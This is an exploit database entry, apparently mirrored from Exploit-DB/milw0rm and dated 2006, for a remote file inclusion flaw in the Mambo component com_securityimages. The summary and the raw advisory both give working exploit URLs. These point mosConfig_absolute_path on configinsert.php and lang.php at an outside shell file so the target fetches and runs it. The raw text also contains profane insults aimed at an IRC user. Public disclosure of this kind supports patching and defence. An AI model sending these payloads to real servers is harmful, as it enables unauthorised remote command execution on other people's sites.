com_securityimages Mambo Remote File Include

vendor:

com_securityimages

by:

Drago84

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: com_securityimages

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

com_securityimages Mambo Remote File Include

This bug allows a remote attacker to execute commands via rfi. The vulnerable pages are client.php, configinsert.php, lang.php and server.php. The exploit can be executed by sending a malicious URL like http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt or http://web/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt

Mitigation:

Update to the latest version of com_securityimages

Source

Exploit-DB raw data:

# http://forge.joomla.org/sf/projects/com_securityimages

##### Marckusbest is the Best lamah of irc, fuck you
##########
com_securityimages Mambo  Remote File Include
------------------------------------------------------------------------------------
Bug Found by: Drago84
greetz: Exclusive Security
This bug allows a remote atacker to execute commands via
rfi

page:
client.php
configinsert.php
lang.php
server.php

expl:
http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt

########## MarckusBest Fottiti
#############################

# milw0rm.com [2006-07-28]